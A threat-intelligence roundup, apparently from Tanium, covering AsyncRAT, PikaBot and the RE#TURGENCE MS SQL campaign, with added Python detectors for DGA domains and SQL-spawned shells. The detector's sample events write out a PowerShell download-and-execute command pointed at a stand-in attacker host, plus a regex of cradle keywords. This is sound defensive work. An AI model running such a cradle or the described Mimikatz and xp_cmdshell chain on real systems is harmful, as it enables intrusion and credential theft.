CTI Roundup: AsyncRAT, PikaBot Malware, and MS SQL Servers Under Attack
AsyncRAT appears in a new campaign, Water Curupira distributes PikaBot loader malware, and Turkish hackers exploit global MS SQL servers
This week, CTI investigates a new campaign that has been observed delivering AsyncRAT. Next, CTI explains how a threat actor known as Water Curupira is actively distributing the PikaBot loader malware via spam campaigns. CTI wraps up with a look at a financially motivated campaign named RE#TURGENCE that targets insecure Microsoft SQL servers around the globe.
1. AsyncRAT appears in a new campaign
AT&T Alien Labs has discovered a new campaign that delivers AsyncRAT to victims. For 11 months, the threat actor behind the campaign has been delivering the malware via an initial JavaScript file embedded within a phishing page. Researchers have uncovered over 300 samples and more than 100 domains, highlighting the actor’s persistence.
What is AsyncRAT?
AsyncRAT has been around since at least 2019, when it was released as an open-source remote access tool. The tool is still available today on GitHub, making it a very commonly used RAT among threat actors. It is known for keylogging, exfiltration techniques, and initial access staging for final payload delivery.
In September 2023, AT&T observed a spike in phishing emails targeting a set of individuals. The phishing emails contained a GIF attachment that would lead to an SVG file. The SVG file, in turn, led to the download of a highly obfuscated JavaScript file, followed by obfuscated PowerShell scripts and a final execution of an AsyncRAT client.
Pivoting off patterns in the code enabled AT&T researchers to identify additional samples in this campaign, finding samples dating back to February 2023. The registration of domains and discovery of AsyncRAT samples is ongoing.
Technical analysis
- The AsyncRAT loader has multiple stages that are obfuscated further by a C2 server that checks if the malware is running in a sandbox environment before deploying the main AsyncRAT payload.
- JavaScript files are delivered to the victim via malicious phishing web pages throughout the campaign. The files contain long strings that are commented out and have texts composed of randomly positioned words such as Melville, church, chapter and scottish.
- The script itself is highly obfuscated and has several functions to move the detectable commands/strings around. The malware modifies the C2 and the URL every so often, making detection more difficult. Further, the threat actor is seemingly trying to make a new version of the loader for every victim. The new files have new randomized variable names, again making detection difficult.
- If the C2 receives an invalid response and the malware is operating in a sandbox, it will redirect the request to Google or return a script that reaches out to a payload hosted on temp[.]sh. This domain hosts files for roughly three days and generates a new randomized URL path for each new uploaded file. The file at first glance appears to be an AsyncRAT client based on some of the antivirus detections. However, when decompiled, the RAT is actually a distraction for those who may be investigating the campaign. The sample is a decoy file that was made to resemble a RAT but does not contain a C2 server and contains strings such as LOL.
- If the C2 receives a valid response and the malware is not operating in a sandbox, it will serve a script with the next domain and URL obfuscated, which will later download AsyncRAT.
Network infrastructure
The code in this campaign is constantly changing and is heavily obfuscated, which can make detection difficult. As it relates to network infrastructure, the observed samples reached out to a range of domains, updating the list frequently.
While the domains changed often, they did share common characteristics, such as a TLD of .top and eight random alphanumeric characters. Additional shared characteristics included having Nicenic[.]net, Inc as the registrar, having a country code of South Africa, and always being created just a few days before their use.
A script led researchers to a new set of domains. Unlike the previously observed sample, these samples did not have a hardcoded domain under the obfuscation. Instead, they contained a script to calculate the domain based on the current date, allowing the samples to automatically change the C2 domain over time.
The domain generation algorithm (DGA) generated a seed using the day of the year and made some modifications to it to ensure a new domain is produced every seven days. This seed is then used to pick 15 letters from “a” to “n” to generate the domain. These patterns enable researchers not only to identify historical samples but also to build detections that identify future infrastructure.
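The two infrastructure patterns described above (eight random alphanumeric characters under .top, and a 15-letter DGA label drawn only from “a” through “n”) can be turned into a simple DNS-log detection. This is an added example, not AT&T Alien Labs' code; the exact seed derivation of the DGA is not published, so the check matches the shape of the generated names rather than regenerating them, and the log format and sample queries are constructed.

```python
import re
from typing import List, Optional, Tuple

# Heuristics derived from the campaign write-up (added example, not AT&T's code):
#   (a) eight random alphanumeric characters directly under the .top TLD
#   (b) a 15-letter label using only the letters "a" through "n" (DGA output shape;
#       the TLD for the DGA domains is not stated, so any TLD is accepted)
RANDOM_TOP = re.compile(r"^[a-z0-9]{8}\.top$")
DGA_SHAPE = re.compile(r"^[a-n]{15}\.[a-z]{2,}$")


def classify_domain(domain: str) -> Optional[str]:
    """Return the name of the heuristic a query name matches, or None."""
    d = domain.strip().rstrip(".").lower()
    if RANDOM_TOP.match(d):
        return "asyncrat-random-top"
    if DGA_SHAPE.match(d):
        return "asyncrat-dga-shape"
    return None


def scan_dns_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Parse constructed '<timestamp> <client> <qname>' rows and flag matches."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed rows instead of aborting the scan
        ts, client, qname = parts
        label = classify_domain(qname)
        if label:
            hits.append((ts, client, label))
    return hits


# Constructed sample log lines; none of these are real indicators
SAMPLE_LOG = [
    "2023-09-12T10:01:02Z 10.0.0.5 www.example.com",
    "2023-09-12T10:01:09Z 10.0.0.5 a1b2c3d4.top",
    "2023-09-12T10:02:30Z 10.0.0.7 abcdefghijklmna.top",
    "2023-09-12T10:03:00Z 10.0.0.7 abcdefghijklmnop.top",
    "2023-09-12T10:03:05Z 10.0.0.9 shortlabel.top",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG):
        print(hit)
```

The eight-character .top pattern will also match some legitimate names, so hits are best enriched with the registrar and domain age characteristics the report describes before alerting.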
Analyst comments from Tanium’s Cyber Threat Intelligence team
This campaign is a prime example of how determined threat actors can be, and how easy it can be for them to go unnoticed.
In many cases, developers will have the malware stop entirely and exit if it is determined to be in a sandbox so that it cannot be analyzed further. Interestingly, the developer in this campaign put extra time and effort into creating a decoy RAT that is essentially designed to waste an analyst’s time before realizing they were not fed the true malware.
This is an interesting case of a malware author putting extra time into something that doesn’t make the malware stealthier or more complex but simply aims to annoy analysts.
2. Water Curupira distributes PikaBot loader malware
A threat actor known as Water Curupira is actively distributing the PikaBot loader malware via spam campaigns.
This actor generally carries out campaigns for the purpose of dropping backdoors, which often lead to ransomware attacks (mainly Black Basta).
The PikaBot loader exhibits many of the same behaviors as the notorious QBot, and its rise in popularity seemingly coincides with the takedown of QBot.
Initial access
The attack begins with a malicious email that is delivered via thread hijacking. The email contains an attachment that is either a password-protected archive ZIP file containing an IMG file or a PDF file. If needed, the actor will include the password to the file in the email.
First stage
The archive attached to the email contains a heavily obfuscated JavaScript file with a size of more than 100 KB. When executed, the script launches a series of commands. It first attempts execution using cmd.exe. If this is unsuccessful, it will echo a designated string to the console and try to ping a specified target using the same string. If this fails, it will employ Curl.exe to download the PikaBot payload from an external server.
Another attack chain was also observed where the threat actor did not use a malicious script, but rather used an IMG file from the email’s PDF attachment that contained two additional files. These additional files were the PikaBot payload. The latter approach emerged towards the end of 2023.
PikaBot payload
Trend Micro analyzed a DLL file that was extracted from the archive in the first stage, finding it to be a 32-bit DLL with 1515 exports. The DLL ultimately decrypts and executes shellcode that will decrypt yet another DLL file. This DLL file is loaded into memory and eventually executed. The decrypted DLL file executes an anti-analysis routine that loads incorrect libraries and other irrelevant items to detect sandboxes.
After performing anti-analysis, the malware will load a set of PNG images that contain an encrypted piece of the core module. After decrypting them, the PikaBot injector creates a suspended process and injects the core module into it, while using indirect system calls to hide its injection.
PikaBot uses two functions to get the addresses of three needed APIs. These include GetProcAddress, LoadLibraryA, and HeapFree. The core module will check the system’s language and will stop execution if the language is found to be Russian or Ukrainian.
After ensuring that only one instance of itself is currently running, it will obtain details about the system to send to the C2. The malware will create a named pipe and use it to temporarily store additional information it gathers. Once the malware collects all the information it deems necessary, it will send it to an IP address appended with a specific URL.
Impact
Water Curupira often carries out campaigns that result in Black Basta ransomware. This is what makes PikaBot campaigns such a threat.
Trend Micro identified distinct clusters of Cobalt Strike beacons with over 70 C2 domains that lead to Black Basta and that could have been dropped via campaigns carried out by this threat actor.
Analyst comments from Tanium’s Cyber Threat Intelligence team
PikaBot infections tend to result in the deployment of Black Basta ransomware. As a result, PikaBot is not a threat to take lightly.
Further, numerous researchers have identified overlaps and potential connections between PikaBot and QBot. The timing of QBot being taken down around the same time that PikaBot rose in popularity is uncanny.
While we don’t know for sure if PikaBot is the new QBot, its potential ties to Black Basta ransomware and its sophisticated multi-stage nature make it a threat to be wary of.
3. Turkish hackers exploit global MS SQL servers
A financially motivated campaign, now codenamed RE#TURGENCE, is targeting insecure Microsoft SQL servers across the globe, brute forcing them as a means of initial access. The campaign ends in one of two ways: either the obtained access is sold, or ransomware is delivered.
The threat actor begins by brute forcing their way into a poorly secured MS SQL server and using the xp_cmdshell procedure to execute commands on the host. After gaining code execution, they launch additional commands from the sqlservr.exe process.
- The first command calls cmd.exe, which downloads a file, 189jt, from the attacker’s remote server and executes the code it contains using a PowerShell invoke expression. The PowerShell script will download and run the next stage of the attack.
- The next PowerShell script contains an obfuscated Cobalt Strike payload that loads into the currently running process. The obfuscation is focused on the DLL imports and the Cobalt Strike payload, which was found to contain hundreds of lines of combined variables and unneeded comment blocks. The Cobalt Strike Beacon was configured to inject into the Windows-native process SndVol.exe. The threat actor then downloaded AnyDesk binaries from a mounted network share.
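The execution chain described above (xp_cmdshell causing sqlservr.exe to spawn cmd.exe, followed by a PowerShell invoke expression that downloads the next stage) is a good fit for process-lineage detection. The following is an added example, not Securonix's or Tanium's detection logic; the event fields and sample events are constructed in the style of a Sysmon-like process-creation feed, and the URL and file name in them are placeholders.

```python
import re
from typing import Dict, List

Event = Dict[str, str]  # constructed fields: pid, parent_image, image, command_line

# PowerShell download-cradle markers; word boundaries avoid matching e.g. "index" on "iex"
CRADLE = re.compile(r"\b(iex|invoke-expression|downloadstring|downloadfile)\b|https?://", re.I)


def is_sql_spawned_shell(ev: Event) -> bool:
    """xp_cmdshell runs its command line as a child of sqlservr.exe via cmd.exe."""
    parent = ev["parent_image"].lower()
    image = ev["image"].lower()
    return parent.endswith("sqlservr.exe") and image.endswith(("cmd.exe", "powershell.exe"))


def is_download_cradle(ev: Event) -> bool:
    """PowerShell whose command line fetches and evaluates remote content."""
    return ev["image"].lower().endswith("powershell.exe") and CRADLE.search(ev["command_line"]) is not None


def detect(events: List[Event]) -> List[str]:
    """Return one alert per event that matches a RE#TURGENCE-style step."""
    alerts = []
    for ev in events:
        if is_sql_spawned_shell(ev):
            alerts.append(f"pid {ev['pid']}: shell spawned by SQL Server: {ev['command_line']}")
        elif is_download_cradle(ev):
            alerts.append(f"pid {ev['pid']}: PowerShell download cradle: {ev['command_line']}")
    return alerts


# Constructed sample events (placeholder host "attacker.invalid"; 189jt is the file name from the report)
SAMPLE_EVENTS: List[Event] = [
    {"pid": "1200", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "command_line": "sqlservr.exe"},
    {"pid": "3412", "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c powershell -nop -w hidden -c ..."},
    {"pid": "3420", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://attacker.invalid/189jt')"},
    {"pid": "5100", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell Get-Process"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Pairing this with the later AnyDesk downloads of Mimikatz and the ransomware payload, as the report describes, gives an analyst several linked points on the same host to investigate.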
Credential access
The threat actor was observed downloading Mimikatz to the system using AnyDesk along with another batch script that was used to automate some of the Mimikatz commands.
The script is responsible for performing multiple functions. It first uses a known registry tweak to enable clear text credentials. After this it performs a few checks before executing Mimikatz from the appropriate subdirectory. The results of the Mimikatz dump are saved to a Mimikatz_dump.txt file.
Discovery and lateral movement
After using Mimikatz, the threat actor shifted to discovery efforts. They used AnyDesk to download the Advanced Port Scanner utility. This utility was used to check domain controller remote shares, get the hostname of a Hyper-V VM, test and run psexec.exe on a domain controller, test and use RDP, and more. A few days later, the threat actor was able to move laterally to two other machines in the network. The threat actor used psexec to open a new session to a domain controller with a password that was obtained from the Mimikatz dump. Using this account, they were able to move to additional machines.
Impact
After moving to a few additional machines, the threat actor used AnyDesk to download a ransomware payload as red25.exe. The payload is a self-extracting archive that extracts and runs the final ransomware payload. The ransomware used in this campaign is Mimic ransomware. Mimic ransomware makes use of legitimate apps to query and locate files to be encrypted.
After completing its encryption process, the ransomware drops the encryption/payment notice to the victim. The ransomware was ultimately manually executed by the threat actors on the MS SQL server first, then a domain controller, then other domain-joined hosts.
Analyst comments from Tanium’s Cyber Threat Intelligence team
The practice of targeting poorly secured MS SQL servers does not appear to be going away soon, largely because it continues to be fruitful for threat actors.
That aside, this threat actor relies heavily on AnyDesk for multiple stages of the attack. This underscores how common it is becoming for threat actors to abuse legitimate tools in their operations, and therefore how important it is for defenders to monitor for such abuse.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.